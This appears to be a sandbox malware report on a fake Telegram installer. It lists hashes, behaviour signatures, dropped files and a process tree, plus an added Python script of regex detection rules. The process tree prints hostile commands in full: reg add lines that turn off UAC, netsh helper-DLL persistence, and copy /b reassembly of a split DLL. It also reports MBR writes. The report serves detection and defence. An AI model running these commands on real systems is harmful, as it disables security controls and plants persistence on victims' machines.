Analysis

  • max time kernel
    122s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    02/08/2024, 14:54 UTC

General

  • Target

    win_X64-telegram-TG-zwb5.09.exe

  • Size

    106.0MB

  • MD5

    7e5e997bacfd13d0e4334d3633a5a0c7

  • SHA1

    5c00469208e2bf98d467ea18c50cbf1b59a8da8b

  • SHA256

    1a6b8de03d8197a402c830f55e61b8a0a8912d56c458a6a6096029ccc0b2fb29

  • SHA512

    0670220677d34d656b1055dff92ca44234e1e75e434dab9b4c55ced36dcda4da76e9023cecda2bbc2aa32dca2b7f4c50e1df8910cc9e56f2e2d9ffd164d14658

  • SSDEEP

    1572864:jIVwGw8QkX/YZhf6a/XXe8MUQE3nsMHHiUyRLelUyRLelUyRLelUyRLelUyRLelo:jIVwGwOXgrf68X4UhsXj

Signatures

  • UAC bypass (3 TTPs, 3 IoCs)

    Three reg add commands (see Processes) set EnableLUA, ConsentPromptBehaviorAdmin and PromptOnSecureDesktop to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. Together these remove the UAC prompt entirely rather than evade it: ConsentPromptBehaviorAdmin=0 elevates without asking, PromptOnSecureDesktop=0 moves any remaining prompt off the secure desktop, and EnableLUA=0 disables UAC altogether once the machine reboots. Writing these values already requires an elevated token.

  • Executes dropped EXE (4 IoCs)
  • Loads dropped DLL (17 IoCs)
  • Checks installed software on the system (1 TTP)

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) (1 TTP, 1 IoC)

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. Helper DLLs registered with it (ATT&CK T1546.007) are recorded under HKLM\SOFTWARE\Microsoft\NetSh and loaded every time netsh.exe starts, which makes the registration a persistence mechanism. Here netsh.exe is invoked with -f on a file under C:\Users\Public\Pictures; the page does not show that file's contents.

  • System Location Discovery: System Language Discovery (1 TTP, 1 IoC)

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Gathers network information (2 TTPs, 1 IoC)

    Uses a command-line utility (ipconfig /all) to view the network configuration.

  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of SetWindowsHookEx (5 IoCs)
  • Suspicious use of WriteProcessMemory (34 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\win_X64-telegram-TG-zwb5.09.exe
    "C:\Users\Admin\AppData\Local\Temp\win_X64-telegram-TG-zwb5.09.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5626914 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\win_X64-telegram-TG-zwb5.09.exe" "__IRCT:1" "__IRTSS:0" "__IRSID:S-1-5-21-940600906-3464502421-4240639183-1000"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\Mari.exe
        "C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\Mari.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ipconfig /all
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2064
          • C:\Windows\system32\ipconfig.exe
            ipconfig /all
            5⤵
            • Gathers network information
            PID:2448
        • C:\Windows\System32\netsh.exe
          "C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\hP2M9.xml
          4⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:1756
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\M6X6o.bat"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:620
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
            5⤵
            • UAC bypass
            PID:2468
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
            5⤵
            • UAC bypass
            PID:1532
          • C:\Windows\system32\reg.exe
            reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
            5⤵
            • UAC bypass
            PID:2540
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c copy /b C:\Users\Public\Pictures\V20vK\25oi2~i\p+C:\Users\Public\Pictures\V20vK\25oi2~i\w C:\Users\Public\Pictures\V20vK\25oi2~i\xlstat4.dll
          4⤵
            PID:2376
    • C:\Windows\system32\mmc.exe
      C:\Windows\system32\mmc.exe -Embedding
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Users\Public\Pictures\V20vK\25oi2~i\XmpLiveUD.exe
        "C:\Users\Public\Pictures\V20vK\25oi2~i\XmpLiveUD.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Writes to the Master Boot Record (MBR)
        • System Location Discovery: System Language Discovery
        PID:2316

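The process tree above is the useful part of this report for detection engineering: the behaviours are visible in plain command lines (three reg add writes to the UAC policy key, netsh -f on a script file, copy /b joining two fragments into a DLL, ipconfig /all). The following is an added example written for this page, not tria.ge's own signature code. It runs simple rules over the command lines copied from the Processes section; the rule names, the regexes and the list of staging extensions are the editor's choices, and the benign reg add line in the usage note is constructed to show the value check.

```python
"""Added example (editor's code, not tria.ge's signature logic): scan the
command lines from this report's process tree and flag the behaviours the
signatures describe. The command lines are copied from the report; the rule
names and regexes are the editor's choice."""
import re

# Command lines copied from the Processes section of this report.
COMMAND_LINES = [
    r'C:\Windows\system32\cmd.exe /c ipconfig /all',
    r'"C:\Windows\System32\netsh.exe" -f C:\Users\Public\Pictures\hP2M9.xml',
    r'"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Roaming\M6X6o.bat"',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F',
    r'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F',
    r'"C:\Windows\System32\cmd.exe" /c copy /b C:\Users\Public\Pictures\V20vK\25oi2~i\p+C:\Users\Public\Pictures\V20vK\25oi2~i\w C:\Users\Public\Pictures\V20vK\25oi2~i\xlstat4.dll',
]

# The three values under Policies\System that together turn UAC prompting off.
UAC_VALUES = ("EnableLUA", "ConsentPromptBehaviorAdmin", "PromptOnSecureDesktop")

UAC_POLICY = re.compile(
    r'reg(?:\.exe)?"?\s+add\s+"?(?:HKEY_LOCAL_MACHINE|HKLM)\\SOFTWARE\\Microsoft\\Windows'
    r'\\CurrentVersion\\Policies\\System"?\s+/v\s+(' + '|'.join(UAC_VALUES) + r')\s+'
    r'/t\s+reg_dword\s+/d\s+(\d+)',
    re.IGNORECASE,
)
# netsh -f <file> / netsh exec <file> runs a netsh script; an "add helper" line
# in such a script registers a DLL that every later netsh.exe start will load.
NETSH_SCRIPT = re.compile(r'netsh(?:\.exe)?"?\s+(?:-f|exec)\s+(\S+)', re.IGNORECASE)
# copy /b a+b out: binary concatenation, used here to rebuild a DLL from two halves.
COPY_CONCAT = re.compile(r'copy\s+/b\s+(\S+(?:\+\S+)+)\s+(\S+)', re.IGNORECASE)
STAGING_EXTS = (".dll", ".exe", ".sys", ".scr")   # editor's choice of interesting outputs
IPCONFIG = re.compile(r'\bipconfig(?:\.exe)?\s+/all\b', re.IGNORECASE)


def classify(cmdline: str) -> list:
    """Return the rule hits for one command line (empty list if nothing matched)."""
    hits = []
    m = UAC_POLICY.search(cmdline)
    if m and int(m.group(2)) == 0:          # writing 1 would restore UAC, so only 0 is flagged
        hits.append(f"uac_policy_weakened:{m.group(1)}")
    m = NETSH_SCRIPT.search(cmdline)
    if m:
        hits.append(f"netsh_script_exec:{m.group(1)}")
    m = COPY_CONCAT.search(cmdline)
    if m and m.group(2).lower().endswith(STAGING_EXTS):
        hits.append(f"split_payload_reassembled:{m.group(2)}")
    if IPCONFIG.search(cmdline):
        hits.append("network_recon:ipconfig /all")
    return hits


def uac_values_set(cmdlines) -> dict:
    """Which of the three UAC policy values were written, and to what."""
    state = {}
    for line in cmdlines:
        m = UAC_POLICY.search(line)
        if m:
            state[m.group(1)] = int(m.group(2))
    return state


def uac_prompting_disabled(cmdlines) -> bool:
    """True when all three values were zeroed: no UAC prompt is left at all
    (EnableLUA=0 only takes full effect after the next reboot)."""
    return all(uac_values_set(cmdlines).get(v) == 0 for v in UAC_VALUES)


def scan(cmdlines) -> dict:
    """Map each rule hit to the command line that produced it."""
    return {hit: line for line in cmdlines for hit in classify(line)}


if __name__ == "__main__":
    for hit, line in scan(COMMAND_LINES).items():
        print(f"{hit:70}  <- {line[:60]}")
    print("UAC prompting disabled:", uac_prompting_disabled(COMMAND_LINES))
```

Run against the seven command lines, scan() returns six hits (the cmd.exe /C M6X6o.bat launch matches nothing on its own; its three children do) and uac_prompting_disabled() is True. A constructed line such as `reg add HKLM\...\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f` yields no hit, since only a zero value weakens the policy.
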
    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPG

      Filesize

      107KB

      MD5

      81a7a4f9e9cf23b18a5830cd8820fa73

      SHA1

      509f342811540edff486945380755557349d60db

      SHA256

      7e32d7c8c0d36644016fc48294a721ef5bb56277aa45c79016fbe28d9256f075

      SHA512

      40ab0c46ba91062cc723f38d90fc44dcd6f173524ef4c60eb71cd6496556cd8913b3737a338fe7de3ce29b7e9fd7558723eb3bd209123f502b2e48f8b36cb630

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG3.JPG

      Filesize

      87KB

      MD5

      a7db741aeb82ca0510d681271a09c90a

      SHA1

      583a8f2c8af8e2d802da8921d8a3009000f9531e

      SHA256

      e82ba7cb345dc28ffa8b1f662e58bb3266690f39948617e0d42109a752adff2a

      SHA512

      ee9f1275fd5247d658f228eb7c0d318e9210ac261a877ef47304d71ca401f342426b2f260ee4cc8212f849a93cd87e8e25e9d7b2278b9fb9a0e3a2836d7b0d06

    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe

      Filesize

      4.9MB

      MD5

      b0a1f1e0a106e1a62753c8a07fb3809b

      SHA1

      b4bab82aa173a401a2f16f8b4ad91105a895b2d9

      SHA256

      f7e07f7936269756bb73e91c8b280c2ab8532fb5bf15085d96eaebc7a05a8950

      SHA512

      ffc97976471e26e938e0389b33c0143b4a55653f90ee35f8220663b2a78fc48a106a204dd25c990817a57f3670d41fd1361cbdbc3bc4894ded882b356649c083

    • C:\Users\Admin\AppData\Roaming\M6X6o.bat

      Filesize

      392B

      MD5

      30d6eb22d6aeec10347239b17b023bf4

      SHA1

      e2a6f86d66c699f6e0ff1ac4e140af4a2a4637d1

      SHA256

      659df6b190a0b92fc34e3a4457b4a8d11a26a4caf55de64dfe79eb1276181f08

      SHA512

      500872c3f2f3f801ec51717690873194675cb7f32cc4a862c09d90c18638d364d49b0e04c32323f52734e5c806e3503a63ac755c7019d762786a72840123df76

    • C:\Users\Admin\AppData\Roaming\TG-CNS\Uninstall\IRIMG2.JPG

      Filesize

      86KB

      MD5

      81f3c5901a89416940bf84f61c011e96

      SHA1

      2d2561a4843d0a9eaa100e05ff41ed4616a8692f

      SHA256

      8a29ff35ce664ee5e87218191efc0e2b39a4d7e0e278c192a9690e69776799c8

      SHA512

      4b31078c87985770852cd2941e8d965376418f4da25b9d6b02291da089ff71cdee0920fef25c70a2470583766ddd7164bf2b578bc1c6e76954b478cddebf6f7b

    • C:\Users\Admin\AppData\Roaming\TG-CNS\Uninstall\uninstall.xml

      Filesize

      9KB

      MD5

      9c8cd23a158b385cc4b4609004936fd7

      SHA1

      b82e423af18f256971538c2f02e0f9b9f9067686

      SHA256

      a4788678f795672138d625e5676605925ac098033f0c5f495c549524e4814105

      SHA512

      909f0a990f64f71144fafa918ebe0a8f3ecf46176bcf2d564069bb99811f6dfd520d0a20a7faa0e6fac19c88494a31c1e09852e59d1272af2cefe04f8060fb22

    • C:\Users\Admin\AppData\Roaming\TG-CNS\Uninstall\uninstall.xml

      Filesize

      15KB

      MD5

      edc29bff723fbccfe969b4b58f333eb1

      SHA1

      a0bec28b1a66cf188efb428593b8a779c872c3f7

      SHA256

      9cdfee326128783944a95754e496481e06528c49c065e254b6a3bd4115a1a7e4

      SHA512

      14c9bb8589c2693d85f4ffedc5ab2d8dde822e1afa2b5124c11deceb46faac67d4b2f28bacc2b36165fa3a64da1a11e1047267dc1e826e95df3057985e9e8b97

    • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\Updater.exe

      Filesize

      172KB

      MD5

      f3f4dde837f9b92abb5dd9fd5d3174e3

      SHA1

      66d3b76b564b577c2392c45ca7f84cc62c037318

      SHA256

      be44239c288ee40899b9ba92edeb64141ee9522c377094298c853d07fb6295cd

      SHA512

      45a741eb7d4ee7430907b9b8a03e91c5d0d64f3b32c54f6c808bad7c92826eeb4180a28339f2df8a1cd1eaf4ac613a30972ccf39593536147b940ee1e1cc5834

    • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\cache_18_7

      Filesize

      648KB

      MD5

      8bae1c34285e15fae092ef5afb4bdb9a

      SHA1

      ce7098ffafa1a0150de43e390f4489bd0a35bfd1

      SHA256

      48d4c29de7c7e13c65856da6963a20f41f9001dab80bb72b68d61cab7fee1d33

      SHA512

      927581328052659a0e65df5499b5e16624145ff61512255c64770194384d7ea5b469c3b1301e63146de7b5fc01bf6acf6e81e567806cdfed3a4b306b98e18ca4

    • C:\Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\cache_22_1

      Filesize

      9.0MB

      MD5

      be5628882d28ba1bdb9850dc4b7e7fa1

      SHA1

      6d37839c4b8ded05c0e8108696e1b794de59a2a8

      SHA256

      def949e97a2a2d2e504f7c85a27a6f2fd44d3a898357398f4aaa7eb033dfb287

      SHA512

      16037fd6ee2bb26e1014e9e69a2ee5d7290ebe5021ed1eedaa5908b73c39cc2ba6f66c553be9a39163b8831e8f519b10009e71fb94ce392c7229541192aa1c39

    • C:\Users\Public\Pictures\V20vK\25oi2~i\LIBEAY32.dll

      Filesize

      1.4MB

      MD5

      ff5c63efbba91a0eec9fc645da655b4c

      SHA1

      d225ceff3601b57add69df7d854b2348a8980255

      SHA256

      e1fbb97ff3607d569d584f78ce77a9dd2cf64dca05aebdbf3e55c9711e07b3be

      SHA512

      96b963823d7a28e4d4ecd703aa26ad3d3e1d4086e09a4cc08ca88c30c9b8ceb42b7daf184e33b9175f87a566e78028cca3e6ab90ed6537598677f27b15eefce5

    • C:\Users\Public\Pictures\V20vK\25oi2~i\NH.txt

      Filesize

      179KB

      MD5

      525e7322fba8241956dad96e7002f33c

      SHA1

      e1afb270a65ab2383c89ee86bfa0715bfb6f0dc9

      SHA256

      e466c05616476d214ca7caef8020a046277e37e340a3470ffcf228ac967ac7c9

      SHA512

      cd609d4ab4319259dff3d92de045f0a9464bd4ecd72bc8e098e279ecdb954b41841f8650f3ab085dca980ac563ab2e4918d2f881d90448f3b7dce74a51ffdcad

    • C:\Users\Public\Pictures\V20vK\25oi2~i\XmpLiveUD.exe

      Filesize

      4.8MB

      MD5

      5fccddc84705ef583e1e105a706a4cea

      SHA1

      fd62980ab42f9062cb2cae7fb432169a660a9391

      SHA256

      b09997d6da86ae913039327a1ca291a405d741722be660046db75e9b76b3176c

      SHA512

      b9a690bf3c01e4e111c1139fac883265d8b97c96d9d6ae2bb4e9c303a622ab2c67b6acd058534f7afb14d9d2f0aa48eefea83d73ebaa7b972ff3c75c0723c4ac

    • C:\Users\Public\Pictures\V20vK\25oi2~i\p

      Filesize

      883KB

      MD5

      8c91824393f6c13ad31925d70a3746fc

      SHA1

      a596499fdf8fc7e047227a9fcfb0ff0728cf940c

      SHA256

      47d889023b791f815b87c139c039eb7270c81dd881b34e894cfc7e49d2823192

      SHA512

      66987ae6131b9dee7f129954415f3cfa3fc56f659853d33b2413c8e886e77d62b438fe12a89948825623f80494da86836e0844f11581c6ef10bfaae1401610d3

    • C:\Users\Public\Pictures\V20vK\25oi2~i\w

      Filesize

      883KB

      MD5

      87d78b3b8c40976b34047cbcdc0e1454

      SHA1

      3f53f3a1e52c80cdd6f5eac7216b3c1816948516

      SHA256

      4240fd9b105b4456fa428baa2e9b48a9ab2bc2736c7c33efaf92092ca45be88a

      SHA512

      4d8be70e5b958029143669b8e72fce4c1da32ef66fea9548501de62462f1d37cec2fdcb1466bf5666f2268843b7e07bf5fda6ec4441cf61cef09324594410043

    • \Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll

      Filesize

      350KB

      MD5

      c916c7815286c5233a49deac81f8543e

      SHA1

      cb964c3c8eae8e7ce170f3ad3a55993f7a1918db

      SHA256

      3d07466b8f5c18afc70c6a9746d43fa7daa39c9bd41e8bfb928c70e7d7458bf4

      SHA512

      0d65283c41c30ee688bf02ec3eec7f6b17a750efc18fa6a66f26c7c6ef8bae860d270b31017f096d8d254c2769be2b7ed64d6b3dc659d1b57d466388271e2c78

    • \Users\Admin\AppData\Roaming\TG-CNS\telegram\tdata\emoji\Mari.exe

      Filesize

      14.5MB

      MD5

      f6c56945b2a627dfebec3b2f80544855

      SHA1

      21eb4d3ea7fa50fc291c6a542437bfb6d834476d

      SHA256

      b4e3976adfb46ac2c1e3f8731b7e49976baf7538ac5d50a85633f3cdfbcb38b0

      SHA512

      0937b528fa8d46d52a683a5ab2ab490b81ef7c03553e62eabd0a02bf7612049f38ba0ac8b27f0b00909a266a366f7d235e2a3289860e38c8d10f2b67d0b789b9

    • \Users\Public\Pictures\V20vK\25oi2~i\XLLiveUpdateAgent.dll

      Filesize

      935KB

      MD5

      95510f67cf120d180362fd2d3ec23d9c

      SHA1

      4787cfb2398fd3285be85e52be633f454bb48ff6

      SHA256

      9f64fdbf96b10a185c51bf9e7d6199e44a5ef3255de40a0a447cf556ac7675f0

      SHA512

      4caf48792686a89e8397813a6b0246b274986e7fdf245d0b1aa3e36b7e9de0be7b618cd483871f76769a569a7b896f5b9f461f62f4d26cedbf257cc74c69f562

    • \Users\Public\Pictures\V20vK\25oi2~i\libcurl.dll

      Filesize

      706KB

      MD5

      4b5dfd7e9ac50a741b5ac6102b30cbf5

      SHA1

      c3ae8f11f12b2160055a28ee8cd0f14d215864dc

      SHA256

      8fbb6e1c42d6ea9fb1f5651d0cad370cbd36fda89035568c460193b1ae316cdc

      SHA512

      9099874416956b53bb7a8d63a215f0e40ae806d21bdad6fcdba002f35c5b3d8827c7d5e5c9500a356a7bdf7a3d402c3d8851dd0df69a72fed752277f32b210cc

    • \Users\Public\Pictures\V20vK\25oi2~i\libexpat.dll

      Filesize

      379KB

      MD5

      0cdb376595b90c8e40169a7332c609cc

      SHA1

      0e47e06237f27388437d8631d055e78a34b37e03

      SHA256

      31d2076066107bd04ab24ff7bbdf8271aa16dd1d04e70bd9cc492e9aa1e6c82b

      SHA512

      3062a64d412d69996d36caf7acf1dd040941ab9adf26841fcb103d4711ffcb8e3a8deaa9374042c882e1e4c3ad51e4d294498c398d2b6adf0f1c6669d6f1d94b

    • \Users\Public\Pictures\V20vK\25oi2~i\ssleay32.dll

      Filesize

      371KB

      MD5

      7456818a22dad2c0965580d8bbf4cabd

      SHA1

      548714607df2ec3b7c8a22cfba3a1776e6e80861

      SHA256

      f3a288c5455b074fe9c9d5a160adeb49e84bbe1832b5fcbe8f26093215192f65

      SHA512

      13f6589bd9c0c60a3df63325c57e94129761adc558d1a65eb4c6e138e6155dd9dbe501d45edde282219dc357593458f5f84a29188d123dcb7770e7479f6a7e68

    • \Users\Public\Pictures\V20vK\25oi2~i\xlstat4.dll

      Filesize

      1.7MB

      MD5

      f5e75394913d746ac50a5d8af30a67b8

      SHA1

      488f9c69740b826b3aaf5c2626eef8d5e107ab01

      SHA256

      c5f367bfe533e0f5a221c01da922ef182a49a326c92aa1d409dc7e2d7dcbedc1

      SHA512

      2734e2f63a115d9699108ae07dd4bcbdc21f503333f3954679b60184736a29220b58dc0b0e220fd7659d9c3b818481108a0d22ed24f7810e7c2daf36fa92d5ef

    • memory/1928-202-0x0000000180000000-0x000000018077E000-memory.dmp

      Filesize

      7.5MB

    • memory/1928-204-0x0000000180000000-0x000000018077E000-memory.dmp

      Filesize

      7.5MB

    • memory/1928-203-0x0000000180000000-0x000000018077E000-memory.dmp

      Filesize

      7.5MB

    • memory/2316-246-0x0000000000A20000-0x0000000000A89000-memory.dmp

      Filesize

      420KB
